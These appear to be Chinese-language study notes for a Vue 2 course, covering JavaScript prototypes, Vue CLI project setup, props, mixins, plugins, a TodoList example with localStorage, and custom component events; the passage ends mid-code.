在 JavaScript 中,"显式原型属性"和"隐式原型属性"是两个不同的概念,涉及到对象的继承和原型链的机制。为了更好地理解这些概念,我们需要先了解原型链以及如何通过原型来实现继承。

    1. 隐式原型属性(__proto__

    定义:

    ​隐式原型属性指的是每个 JavaScript 对象内部都有一个隐式的 __proto__ 属性。它指向对象的构造函数的原型对象(即该对象的父类)。

    特点:
    • __proto__ 不是显式声明的,而是 JavaScript 引擎自动添加到每个对象内部的一个隐藏属性。
    • __proto__ 连接对象与其构造函数的原型对象,是实现原型链继承的基础。
    • 每个对象都有自己的原型对象,原型对象又有自己的原型,形成原型链。当访问对象的属性或方法时,JavaScript 会沿着原型链查找。
    示例:
function Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log('Hello, ' + this.name);
    };

    const p1 = new Person('John');
    console.log(p1.__proto__ === Person.prototype); // true

在上面的代码中,p1.__proto__ 指向 Person.prototype,即 p1 对象的原型。

2. 显式原型属性(prototype)

    定义:

显式原型属性是指构造函数(类)的 prototype 属性。每个函数对象都有一个 prototype 属性,这个属性指向构造函数的原型对象。通过 prototype 属性可以定义构造函数实例共享的属性和方法。

    特点:
    • 构造函数的 prototype 属性用于定义所有实例对象共享的方法或属性。
    • 当你通过构造函数创建实例时,实例对象会通过 __proto__ 指向构造函数的 prototype
    示例:
function Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log('Hello, ' + this.name);
    };

    const p1 = new Person('John');
    const p2 = new Person('Jane');
    p1.sayHello(); // "Hello, John"
    p2.sayHello(); // "Hello, Jane"

在这个例子中,Person.prototype 是 Person 函数的原型对象,sayHello 方法定义在该原型对象上,p1 和 p2 实例通过 __proto__ 访问到 Person.prototype,从而能够共享该方法。

    总结

• 隐式原型属性(__proto__):是每个对象自动拥有的属性,指向该对象的构造函数的原型。
• 显式原型属性(prototype):是每个构造函数自动拥有的属性,指向一个对象,这个对象包含了所有通过该构造函数创建的实例共享的属性和方法。

    ​通过这两种原型属性,JavaScript 实现了基于原型链的继承机制。
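
Back to Vue: the "important built-in relation" of this lesson is that VueComponent.prototype.__proto__ === Vue.prototype, which is exactly why component instances (vc) can see methods and properties placed on Vue.prototype. A minimal sketch, assuming the full Vue 2 build is loaded globally:

// Vue.extend returns a VueComponent constructor
const school = Vue.extend({ template: `<h2>school</h2>` })

// The built-in relation: the component prototype chains up to Vue.prototype
console.log(school.prototype.__proto__ === Vue.prototype) // true

// Consequence: anything placed on Vue.prototype is reachable from a vc
Vue.prototype.$greet = function () { console.log('hello from Vue.prototype') }
const vc = new school()
vc.$greet() // works via the prototype chain above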


    三、单文件组件

    060 单文件组件 & 061 创建 Vue 脚手架 & 062 分析脚手架结构

    ​Vue 脚手架是 Vue 官方提供的标准化开发工具(开发平台)。

    ​安装:

    npm install -g @vue/cli

    ​创建一个项目(选择 Vue2):

    vue create vue_test

    ​启动服务器:

    cd vue_test
    npm run serve


    Babel 是一个广泛使用的 JavaScript 编译器,主要用于将现代 JavaScript(ES6+)代码转换为向后兼容的版本,以便可以在旧版本的浏览器或环境中运行。它支持的主要功能包括:

    1. 语法转换:将新版本的 JavaScript 语法(如箭头函数、模块化等)转换为旧版兼容的语法。
    2. Polyfills:通过插件(如 @babel/preset-envcore-js),可以添加对新 API(如 PromiseArray.prototype.includes 等)的支持。
    3. TypeScript 支持:Babel 可以处理 TypeScript 代码,将其编译为纯 JavaScript。
    4. React 支持:通过 @babel/preset-react,Babel 可以编译 JSX 语法。
    5. 自定义插件:支持通过编写插件来扩展 Babel 的功能。

    Babel 通常用于构建工具(如 Webpack、Rollup)中,配合其他工具实现现代开发。
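
As a hedged illustration (not part of the original notes), a minimal babel.config.js for point 2 — on-demand polyfills via @babel/preset-env plus core-js — might look like this:

// babel.config.js — sketch; assumes @babel/preset-env and core-js 3 are installed
module.exports = {
  presets: [
    ['@babel/preset-env', {
      useBuiltIns: 'usage', // inject polyfills only for APIs the code actually uses
      corejs: 3
    }]
  ]
}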

    ESLint 是一个 JavaScript 的静态代码分析工具,用于查找代码中的问题,并帮助开发者遵循一致的代码风格。它的主要特点包括:

    1. 发现问题:可以发现语法错误、潜在问题(如未定义的变量)以及最佳实践建议。
    2. 代码风格:支持检查代码格式(如缩进、引号、分号等),并强制团队遵守一致的代码风格。
    3. 可定制规则:通过配置文件(如 .eslintrc),开发者可以启用或禁用特定规则。
    4. 插件扩展:支持社区插件(如 React、Vue 等插件)来检查特定框架的代码。
    5. 自动修复:ESLint 可以自动修复一些简单的代码问题,例如格式不一致。
    6. 与编辑器集成:通过插件,可以在编辑器(如 VS Code)中实时查看代码问题。

    ESLint 通常与 Babel 或 TypeScript 配合使用,在开发和 CI/CD 流程中确保代码质量。
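
Likewise, a hedged sketch of an .eslintrc.js close to what Vue CLI generates for a Vue 2 project (the exact rule values are illustrative):

// .eslintrc.js — sketch; plugin:vue/essential comes from eslint-plugin-vue
module.exports = {
  root: true,
  env: { node: true },
  extends: ['plugin:vue/essential', 'eslint:recommended'],
  rules: {
    // tolerate console/debugger while developing, flag them in production builds
    'no-console': process.env.NODE_ENV === 'production' ? 'warn' : 'off',
    'no-debugger': process.env.NODE_ENV === 'production' ? 'warn' : 'off'
  }
}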

Babel 与 ESLint 对比:
• 用途:Babel 转换代码以支持旧环境;ESLint 分析代码并强制执行一致性和质量。
• 目标:Babel 编译现代 JavaScript 到兼容版本;ESLint 发现潜在错误和代码风格问题。
• 执行时机:Babel 在构建时;ESLint 在开发时或代码审查阶段。
• 扩展性:Babel 通过插件和预设支持复杂的语法转换;ESLint 通过插件支持多种框架和编码风格检查。

    总结

    • Babel 是工具链中的“编译器”,确保代码能在目标环境运行。
    • ESLint 是工具链中的“检查员”,确保代码高质量并易于维护。

    ​VSCode 中按下 Ctrl + ` 键可以打开终端。

    ​调整项目的文件结构:

    • vue_test
      • node_modules
      • public
        • favicon.ico
        • index.html
      • src
        • assets
          • logo.png
        • components
          • School.vue
          • Student.vue
        • App.vue
        • main.js

    ​修改文件中的内容:

    <!DOCTYPE html>
    <html lang="">
    <head>
    <meta charset="utf-8">
    <!-- 针对 IE 浏览器的一个特殊配置,含义是让 IE 浏览器以最高的渲染级别渲染页面 -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- 开启移动端的理想视口 -->
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <!-- 配置页签图标 -->
    <link rel="icon" href="<%= BASE_URL %>favicon.ico">
    <!-- 配置网页标题 -->
    <title><%= htmlWebpackPlugin.options.title %></title>
    </head>
    <body>
    <!-- 当浏览器不支持 js 时,noscript 中的元素就会被渲染 -->
    <noscript>
    <strong>We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work properly without JavaScript enabled. Please enable it to continue.</strong>
    </noscript>
    <!-- 容器 -->
    <div id="app"></div>
    <!-- built files will be auto injected -->
    </body>
    </html>
    <template>
    <div class="demo">
    <h2>学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    <button @click="showName">点我提示学校名</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    methods: {
    showName() {
    alert(this.name)
    }
    }
    }
    </script>

    <style>
    .demo {
    background-color: orange;
    }
    </style>
    <template>
    <div>
    <h2>学生姓名:{{name}}</h2>
    <h2>学生年龄:{{age}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    age: 18
    }
    }
    }
    </script>
    <template>
    <div>
    <img src="./assets/logo.png" alt="logo">
    <School></School>
    <Student></Student>
    </div>
    </template>

    <script>
    import School from './components/School.vue';
    import Student from './components/Student.vue';

    export default {
    name: 'App',
    components: {
    School,
    Student
    }
    }
    </script>
    // 该文件是整个项目的入口文件

    // 引入 Vue
    import Vue from 'vue'
    // 引入 App 组件,它是所有组件的父组件
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 Vue 实例对象 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    })

    ​执行下列语句编译:

    npm run serve


    063 render 函数

    ​为什么 main.js 里要用:

    // 创建 Vue 实例对象 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    })

    ​而不是:

    new Vue({
    el: '#app',
    template: `<app></app>`
    })

呢?这是因为 main.js 中引用的不是完整版的 Vue。

    关于不同版本的 Vue:

    1. vue.jsvue.runtime.xxx.js 的区别:
      • vue.js 是完整版的 Vue,包含:核心功能 + 模板解析器。
      • vue.runtime.xxx.js 是运行版的 Vue,只包含:核心功能;没有模板解析器。
2. 因为 vue.runtime.xxx.js 没有模板解析器,所以不能使用 template 配置项,需要使用 render 函数接收到的 createElement 函数去指定具体内容(见下方示例)。
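
A short sketch contrasting the two forms (App as in this project; the '#demo' example is illustrative):

// Runtime-only build: render receives createElement (conventionally named h)
new Vue({
  el: '#app',
  render: h => h(App) // mount the App component
})

// render can also build plain elements without any template parsing:
new Vue({
  el: '#demo',
  render: h => h('h1', '你好') // what template: `<h1>你好</h1>` would need the full build for
})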

    064 修改默认配置

    下列命令输出配置文件:
    vue inspect > output.js

    ​也可通过 vue.config.js 来修改默认配置:

    module.exports = {
    pages: {
    index: {
    // 入口
entry: 'src/XXX.js'
    }
    }
    }
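
Another commonly tweaked option, shown as a hedged sketch — lintOnSave is a documented Vue CLI setting for silencing ESLint during development:

// vue.config.js — sketch
module.exports = {
  lintOnSave: false // skip ESLint checks on each save/compile
}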

    065 ref 属性

    1. 被用来给元素或子组件注册引用信息(id 的替代者)

    2. 应用在 html 标签上获取的是真实 DOM 元素,应用在组件标签上是组件实例对象(vc)

    3. 使用方式:

打标识:<h1 ref="xxx">.....</h1> 或 <School ref="xxx"></School>

      获取:this.$refs.xxx


    <template>
    <div>
    <h1 v-text="msg" ref="title"></h1>
    <button ref="btn" @click="showDOM">点我输出信息</button>
    <School ref="sch"/>
    </div>
    </template>

    <script>
    // 引入 School 组件
    import School from './components/School.vue';

    export default {
    name: 'App',
    components: {School},
    data() {
    return {
    msg: '你好啊朋友!'
    }
    },
    methods: {
    showDOM() {
    console.log(this.$refs.title)
    console.log(this.$refs.btn)
    console.log(this.$refs.sch)
    }
    },
    }
    </script>

    066 props 配置

    ​配置项 props

    ​功能:让组件接收外部传过来的数据

    1. 传递数据:

      <Demo name="xxx"/>
    2. 接收数据:

      第一种方式(只接收):

      props:['name']

      第二种方式(限制类型):

props: {name: String}

      第三种方式(限制类型、限制必要性、指定默认值):

      props: {
      name: {
      type: String, // 类型
      required: true, // 必要性
      default: '老王' // 默认值
      }
      }

    ​备注:props 是只读的,Vue 底层会监测你对 props 的修改,如果进行了修改,就会发出警告,若业务需求确实需要修改,那么请复制 props 的内容到 data 中一份,然后去修改 data 中的数据。
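
A minimal sketch of that recommendation (prop and field names illustrative): seed a data field from the prop and mutate only the copy:

// Child component: receives `age` as a prop but edits a local copy
export default {
  name: 'Student',
  props: ['age'],
  data() {
    return {
      myAge: this.age // props are initialized before data, so this is safe
    }
  },
  methods: {
    grow() {
      this.myAge++ // OK — mutating this.age directly would trigger a Vue warning
    }
  }
}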

    <template>
    <div>
    <Student name="吉安娜" sex="女" :age="18"></Student>
    <hr>
    <Student name="古尔丹" sex="女" :age="30"></Student>
    </div>
    </template>

    <script>
    import Student from './components/Student.vue'

    export default {
    name: 'App',
    components: {
    Student
    }
    }
    </script>
    <template>
    <div>
    <h1>{{ msg }}</h1>
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <h2>学生年龄:{{ age }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    console.log(this)
    return {
    msg: '你好,旅行者。'
    }
    },
    props: ['name', 'age', 'sex']
    }
    </script>

    067 mixin 混入

    ​如果多个 Vue 组件要共用一个属性,可以使用 mixin 混入,将共用的部分用一个 js 文件存储。

    export const hunhe = {
    methods: {
    showName() {
    alert(this.name)
    }
    },
    mounted() {
    console.log('嗬,你好!')
    }
    }
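
One point worth adding (a hedged note, not from the original course): when a mixin and a component define overlapping options, Vue merges them — for data and methods the component's own value wins on conflict, while lifecycle hooks from both sides are kept, the mixin's hook running first. A small sketch:

// mixin.js
export const hunhe = {
  data() {
    return { x: 100, y: 200 }
  },
  mounted() {
    console.log('mixin mounted') // runs before the component's own mounted
  }
}

// A component using it (separate file)
export default {
  mixins: [hunhe],
  data() {
    return { x: 1 } // conflicts with the mixin: the component's x wins, y is merged in
  },
  mounted() {
    console.log('component mounted', this.x, this.y) // 1 200
  }
}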

    局部混入

下面在 Student.vue 和 School.vue 文件中使用混入。

    <template>
    <div>
    <Student></Student>
    <hr>
    <School></School>
    </div>
    </template>

    <script>
    import Student from './components/Student.vue'
    import School from './components/School.vue'

    export default {
    name: 'App',
    components: {
    Student,
    School
    }
    }
    </script>
    <template>
    <div>
    <h2 @click="showName">学生名称:{{name}}</h2>
    <h2>学生性别:{{sex}}</h2>
    </div>
    </template>

    <script>
    import {hunhe} from '../mixin.js'
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '古尔丹',
    sex: 'Male'
    }
    },
    mixins: [hunhe]
    }
    </script>
    <template>
    <div>
    <h2 @click="showName">学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    </div>
    </template>

    <script>
    import {hunhe} from '../mixin.js'
    /* eslint-disable vue/multi-word-component-names */
    export default {
name: 'School',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    mixins: [hunhe]
    }
    </script>

    全局混入

    ​下面使用在 main.js 文件下混入。

    import Vue from 'vue'
    import App from './App.vue'
    import { hunhe } from './mixin'

    Vue.config.productionTip = false
    Vue.mixin(hunhe)

    new Vue({
    render: h => h(App),
    }).$mount('#app')
    <template>
    <div>
    <h2 @click="showName">学生名称:{{name}}</h2>
    <h2>学生性别:{{sex}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '古尔丹',
    sex: 'Male'
    }
    },
    mixins: [hunhe]
    }
    </script>
    <template>
    <div>
    <h2 @click="showName">学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
name: 'School',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    mixins: [hunhe]
    }
    </script>

    068 插件

    ​功能:用于增强 Vue。

    ​本质:包含 install 方法的一个对象,install 的第一个参数是 Vue,第二个以后的参数是插件使用者传递的数据。

    ​定义插件:

    对象.install = function(Vue, options) {
    // 1.添加全局过滤器(这在 Vue3 中被弃用)
    Vue.filter(....)
    // 2.添加全局指令
    Vue.directive(....)
    // 3.配置全局混入(合)
    Vue.mixin(....)
    // 4.添加实例方法
    Vue.prototype.$myMethod = function(){...}
    Vue.prototype.$myProperty = xxxx
    }

    ​使用插件:Vue.use()

    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 引入插件
    import plugins from './plugins'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 应用(使用)插件
    Vue.use(plugins, 1, 2, 3)
    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App)
    })
    export default {
    install(Vue, x, y, z) {
    console.log(x, y, z)
    // 全局过滤器
    Vue.filter('mySlice', function (value) {
    return value.slice(0, 4)
    })

    // 定义全局指令
    Vue.directive('fbind', {
    // 指令与元素成功绑定时(一上来)
    bind(element, binding) {
    element.value = binding.value
    },
    // 指令所在元素被插入页面时
    inserted(element) {
    element.focus()
    },
    // 指令所在的模板被重新解析时
    update(element, binding) {
    element.value = binding.value
    }
    })

    // 定义混入
    Vue.mixin({
    data() {
    return {
    x: 100,
    y: 200
    }
    },
    })

    // 给 Vue 原型上添加一个方法(vm 和 vc 就都能用了)
    Vue.prototype.hello = () => { alert('你好啊') }
    }
    }
    <template>
    <div>
    <h2>学校名称:{{ name | mySlice }}</h2>
    <h2>学校地址:{{ address }}</h2>
    <button @click="test">点我测试一个hello方法</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: '尚硅谷atguigu',
    address: '北京',
    }
    },
    methods: {
    test() {
    this.hello()
    }
    },
    }
    </script>
    <template>
    <div>
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <input type="text" v-fbind:value="name">
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男'
    }
    },
    }
    </script>


    069 scoped 样式

<style lang="less" scoped> 中,lang="less" 将样式语言设定为 Less(默认为 CSS),scoped 将样式的作用范围限定在当前组件内。

    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App)
    })
    <template>
    <div class="demo">
    <h2 class="school">学校名称:{{ name }}</h2>
    <h2>学校地址:{{ address }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: '河百带学',
    address: '河北保定',
    }
    },
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: orange;
    .school {
    font-size: larger;
    }
    }
    </style>
    <template>
    <div class="demo">
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男'
    }
    },
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: skyblue;
    }
    </style>

    070-077 TodoList 案例

    1. 组件化编码流程

      • 拆分静态组件:组件要按照功能点拆分,命名不要与 html 元素冲突

      • 实现动态组件:考虑好数据的存放位置,数据是一个组件在用,还是一些组件在用:

        • 一个组件在用:放在组件自身即可。
    • 一些组件在用:放在他们共同的父组件上(状态提升)。
  • 实现交互:从绑定事件开始。
    2. props 适用于:

      • 父组件 ==> 子组件 通信
      • 子组件 ==> 父组件 通信(要求父先给子一个函数)
      • 使用 v-model 时要切记:v-model 绑定的值不能是 props 传过来的值,因为 props 是不可以修改的!
      • props 传过来的若是对象类型的值,修改对象中的属性时 Vue 不会报错,但不推荐这样做。


    • 父组件组织整个 TodoList 的结构。将所有数据存在 data() 中的 todos 中。
    • 处理 todos 的相关函数也在整个父组件中。
    <template>
    <div id="root">
    <div class="todo-container">
    <div class="todo-wrap">
    <MyHeader :addTodo="addTodo" />
    <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo" />
    <MyFooter :todos="todos" :checkAllTodo="checkAllTodo" :clearAllTodo="clearAllTodo" />
    </div>
    </div>
    </div>
    </template>

    <script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
    return {
    // 由于 todos 是 MyHeader 组件和 MyFooter 组件都在使用,所以放在 App 中(状态提升)
    todos: [
    { id: '001', title: '抽烟', done: true },
    { id: '002', title: '喝酒', done: false },
    { id: '003', title: '开车', done: true }
    ]
    }
    },
    methods: {
    // 添加一个 todo
    addTodo(todoObj) {
    this.todos.unshift(todoObj)
    },
    // 勾选 or 取消勾选一个 todo
    checkTodo(id) {
    this.todos.forEach((todo) => {
    if (todo.id === id) todo.done = !todo.done
    })
    },
    // 删除一个 todo
    deleteTodo(id) {
    this.todos = this.todos.filter(todo => todo.id !== id)
    },
    // 全选 or 取消全选
    checkAllTodo(done) {
    this.todos.forEach((todo) => {
    todo.done = done
    })
    },
    // 清除所有已经完成的 todo
    clearAllTodo() {
    this.todos = this.todos.filter((todo) => {
    return !todo.done
    })
    }
    }
    }
    </script>

    <style>
    /*base*/
    body {
    background: #fff;
    }

    .btn {
    display: inline-block;
    padding: 4px 12px;
    margin-bottom: 0;
    font-size: 14px;
    line-height: 20px;
    text-align: center;
    vertical-align: middle;
    cursor: pointer;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
    border-radius: 4px;
    }

    .btn-danger {
    color: #fff;
    background-color: #da4f49;
    border: 1px solid #bd362f;
    }

    .btn-danger:hover {
    color: #fff;
    background-color: #bd362f;
    }

    .btn:focus {
    outline: none;
    }

    .todo-container {
    width: 600px;
    margin: 0 auto;
    }

    .todo-container .todo-wrap {
    padding: 10px;
    border: 1px solid #ddd;
    border-radius: 5px;
    }
    </style>
    • 使用 v-for 创建若干 todoObj,使得列表中有多个表项。

    • 使用 props 接收 App 传递过来的数据,实现组件之间的数据传递。

    <template>
    <ul class="todo-main">
    <MyItem v-for="todoObj in todos" :key="todoObj.id" :todo="todoObj" :checkTodo="checkTodo"
    :deleteTodo="deleteTodo" />
    </ul>
    </template>

    <script>
    import MyItem from './MyItem'

    export default {
    name: 'MyList',
    components: { MyItem },
    // 声明接收 App 传递过来的数据,其中 todos 是自己用的,checkTodo 和 deleteTodo 是给子组件 MyItem 用的
    props: ['todos', 'checkTodo', 'deleteTodo']
    }
    </script>

    <style scoped>
    /*main*/
    .todo-main {
    margin-left: 0px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding: 0px;
    }

    .todo-empty {
    height: 40px;
    line-height: 40px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding-left: 5px;
    margin-top: 10px;
    }
    </style>
    <template>
    <li>
    <label>
    <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
    <!-- 如下代码也能实现功能,但是不太推荐,因为有点违反原则,因为修改了 props -->
    <!-- <input type="checkbox" v-model="todo.done"/> -->
    <span>{{todo.title}}</span>
    </label>
    <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
    </li>
    </template>

    <script>
    export default {
    name:'MyItem',
    // 声明接收 todo、checkTodo、deleteTodo
    props:['todo','checkTodo','deleteTodo'],
    methods: {
    // 勾选 or 取消勾选
    handleCheck(id){
    //通知 App 组件将对应的 todo 对象的 done 值取反
    this.checkTodo(id)
    },
    // 删除
    handleDelete(id){
    if(confirm('确定删除吗?')){
    // 通知 App 组件将对应的 todo 对象删除
    this.deleteTodo(id)
    }
    }
    },
    }
    </script>

    <style scoped>
    /*item*/
    li {
    list-style: none;
    height: 36px;
    line-height: 36px;
    padding: 0 5px;
    border-bottom: 1px solid #ddd;
    }

    li label {
    float: left;
    cursor: pointer;
    }

    li label li input {
    vertical-align: middle;
    margin-right: 6px;
    position: relative;
    top: -1px;
    }

    li button {
    float: right;
    display: none;
    margin-top: 3px;
    }

    li:before {
    content: initial;
    }

    li:last-child {
    border-bottom: none;
    }

    li:hover{
    background-color: #ddd;
    }

    li:hover button{
    display: block;
    }
    </style>
    <template>
    <div class="todo-header">
    <input type="text" placeholder="请输入你的任务名称,按回车键确认" v-model="title" @keyup.enter="add" />
    </div>
    </template>

    <script>
    import { nanoid } from 'nanoid'
    export default {
    name: 'MyHeader',
    // 接收从 App 传递过来的 addTodo
    props: ['addTodo'],
    data() {
    return {
    // 收集用户输入的 title
    title: ''
    }
    },
    methods: {
    add() {
    // 校验数据
    if (!this.title.trim()) return alert('输入不能为空')
    // 将用户的输入包装成一个 todo 对象
    const todoObj = { id: nanoid(), title: this.title, done: false }
    // 通知 App 组件去添加一个 todo 对象
    this.addTodo(todoObj)
    // 清空输入
    this.title = ''
    }
    },
    }
    </script>

    <style scoped>
    /*header*/
    .todo-header input {
    width: 560px;
    height: 28px;
    font-size: 14px;
    border: 1px solid #ccc;
    border-radius: 4px;
    padding: 4px 7px;
    }

    .todo-header input:focus {
    outline: none;
    border-color: rgba(82, 168, 236, 0.8);
    box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(82, 168, 236, 0.6);
    }
    </style>
    <template>
    <div class="todo-footer" v-show="total">
    <label>
    <!-- <input type="checkbox" :checked="isAll" @change="checkAll"/> -->
    <input type="checkbox" v-model="isAll"/>
    </label>
    <span>
    <span>已完成{{doneTotal}}</span> / 全部{{total}}
    </span>
    <button class="btn btn-danger" @click="clearAll">清除已完成任务</button>
    </div>
    </template>

    <script>
    export default {
    name:'MyFooter',
    props:['todos','checkAllTodo','clearAllTodo'],
    computed: {
    //总数
    total(){
    return this.todos.length
    },
    //已完成数
    doneTotal(){
    //此处使用reduce方法做条件统计
    /* const x = this.todos.reduce((pre,current)=>{
    console.log('@',pre,current)
    return pre + (current.done ? 1 : 0)
    },0) */
    //简写
    return this.todos.reduce((pre,todo)=> pre + (todo.done ? 1 : 0) ,0)
    },
    //控制全选框
    isAll:{
    //全选框是否勾选
    get(){
    return this.doneTotal === this.total && this.total > 0
    },
    //isAll被修改时set被调用
    set(value){
    this.checkAllTodo(value)
    }
    }
    },
    methods: {
    /* checkAll(e){
    this.checkAllTodo(e.target.checked)
    } */
    //清空所有已完成
    clearAll(){
    this.clearAllTodo()
    }
    },
    }
    </script>

    <style scoped>
    /*footer*/
    .todo-footer {
    height: 40px;
    line-height: 40px;
    padding-left: 6px;
    margin-top: 5px;
    }

    .todo-footer label {
    display: inline-block;
    margin-right: 20px;
    cursor: pointer;
    }

    .todo-footer label input {
    position: relative;
    top: -1px;
    vertical-align: middle;
    margin-right: 5px;
    }

    .todo-footer button {
    float: right;
    margin-top: 5px;
    }
    </style>
graph TD
  A[App.vue]
  B[MyHeader.vue]
  C[MyFooter.vue]
  D[MyList.vue]
  E[MyItem.vue]
  A -->|addTodo| B
  A -->|todos, checkAllTodo, clearAllTodo| C
  A -->|todos, checkTodo, deleteTodo| D
  D -->|todo, checkTodo, deleteTodo| E

    078 浏览器本地存储

    ​WebStorage 分为 SessionStorageLocalStorage

    1. 存储内容大小一般支持 5MB 左右(不同浏览器可能还不一样)

    2. 浏览器端通过 Window.sessionStorageWindow.localStorage 属性来实现本地存储机制。

    3. 相关 API:

• xxxxxStorage.setItem('key', 'value');

        该方法接受一个键和值作为参数,会把键值对添加到存储中,如果键名存在,则更新其对应的值。

• xxxxxStorage.getItem('person');

        该方法接受一个键名作为参数,返回键名对应的值。

• xxxxxStorage.removeItem('key');

        该方法接受一个键名作为参数,并把该键名从存储中删除。

      • xxxxxStorage.clear();

        该方法会清空存储中的所有数据。

    4. 备注:

  • SessionStorage 存储的内容会随着浏览器窗口关闭而消失
  • LocalStorage 存储的内容,需要手动清除才会消失
  • xxxxxStorage.getItem(xxx) 如果 xxx 对应的 value 获取不到,那么 getItem 的返回值是 null
      • JSON.parse(null) 的结果依然是 null
WebStorage 常用 API 一览:
• setItem(key, value):保存一对键值对数据,值会被转换为字符串存储。
• getItem(key):获取指定键的值,如果键不存在,返回 null。
• removeItem(key):删除指定键的键值对。
• clear():清空存储中的所有数据。
• key(index):根据索引获取存储中的键名,索引从 0 开始,超出范围返回 null。
• length:返回存储中键值对的数量(这是属性,而非方法)。
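
A short sketch of the round-trip pattern the next section relies on — objects must pass through JSON, and a missing key yields null, which the || fallback absorbs:

// localStorage only stores strings, so serialize objects first
const todos = [{ id: '001', title: '抽烟', done: true }]
localStorage.setItem('todos', JSON.stringify(todos))

// getItem returns null for a missing key, and JSON.parse(null) is null too,
// so `|| []` provides a safe default on first visit
const saved = JSON.parse(localStorage.getItem('todos')) || []
console.log(saved.length) // 1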

    079 TodoList 本地存储

    ​在 070-077 的 TodoList 案例下的 App.vue,给 todos 修改 data()(读取 localStorage 载入到 todos 中)和 watch(深度监视,修改 todos 的值时同时修改 localStorage 里的值)。

    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
    return {
    // 由于 todos 是 MyHeader 组件和 MyFooter 组件都在使用,所以放在 App 中(状态提升)
    todos: JSON.parse(localStorage.getItem('todos')) || []
    }
    },
    methods: {
    ...
    },
    watch: {
    todos: {
    handler(value) {
    console.log('todos');
    localStorage.setItem('todos', JSON.stringify(value));
    },
    deep: true
    }
    }

    }

    080-082 组件自定义事件-绑定-解绑-总结

    组件的自定义事件:

1. 一种组件间通信的方式,适用于:子组件 ==> 父组件

    2. 使用场景:A 是父组件,B 是子组件,B 想给 A 传数据,那么就要在 A 中给 B 绑定自定义事件(事件的回调在 A 中)

    3. 绑定自定义事件:

      • 第一种方式,在父组件中:<Demo @atguigu="test"/><Demo v-on:atguigu="test"/>

      • 第二种方式,在父组件中:

        <Demo ref="demo"/>
        ...
        mounted() {
this.$refs.demo.$on('atguigu',this.test)
        }
      • 若想让自定义事件只能触发一次,可以使用 once 修饰符,或 $once 方法。

    4. 触发自定义事件:this.$emit('atguigu', 数据)

    5. 解绑自定义事件:this.$off('atguigu')

    6. 组件上也可以绑定原生 DOM 事件,需要使用 native 修饰符

7. 注意:通过 this.$refs.xxx.$on('atguigu', 回调) 绑定自定义事件时,回调要么配置在 methods 中,要么用箭头函数,否则 this 指向会出问题!(见下方示例)
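
A hedged sketch of note 7, inside App's options — a plain callback is invoked with the emitting child as this, so only a bound method or an arrow function sees App:

export default {
  // ...
  methods: {
    getStudentName(name) {
      this.studentName = name // methods are bound to their own vm, so `this` is App
    }
  },
  mounted() {
    // OK: bound method
    this.$refs.student.$on('atguigu', this.getStudentName)
    // OK: arrow function captures App's `this` lexically
    this.$refs.student.$on('atguigu', name => { this.studentName = name })
    // Pitfall: a plain function is called with the emitter (the Student vc) as `this`
    this.$refs.student.$on('atguigu', function () { console.log(this) })
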